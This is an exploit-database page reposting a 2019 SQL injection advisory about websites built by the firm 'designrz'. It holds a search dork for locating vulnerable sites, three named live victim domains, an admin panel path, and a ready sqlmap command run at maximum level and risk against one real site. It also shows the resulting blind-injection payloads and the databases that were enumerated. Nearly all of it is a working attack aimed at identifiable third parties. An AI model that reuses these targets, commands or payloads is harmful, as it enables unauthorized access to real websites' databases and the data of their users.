Website designed & developed by designrz. SQL Injection vulnerability

CVE	Category	Price	Severity
	CWE-89	Unknown	Unknown

Author	Risk	Exploitation Type	Date
Unknown	Unknown	Remote	2019-07-07

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070033

Below is a copy:

Website designed & developed by designrz. SQL Injection vulnerability

# Exploit Title:Website designed & developed by designrz. SQL Injection vulnerability
# Date:07.07.2019
# Dork:inurl:.php?id= intext:website designed & developed by designrz.
# Exploit Author:H9xHacker
# Tested on:Linux

Reverse check bing.com

ip:170.10.164.63 .php?id= (This server contains 236 domains)

#Demo
iskconamritsar.com/programs2.php?id=11
admissionoverseas.com/book-appointment.php?id=41
dcmgroup.in/education.php?id=7

# Admin control panel path

site/com/cms/index.php

# Poc:
sqlmap.py --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'www.iskconamritsar.com/programs2.php?id=24' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6246' OR 9878=9878-- cSiP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=24' AND SLEEP(5)-- SiPf
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] iskconas_iskcon

----------------------------------
Greets:And All My Friends

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum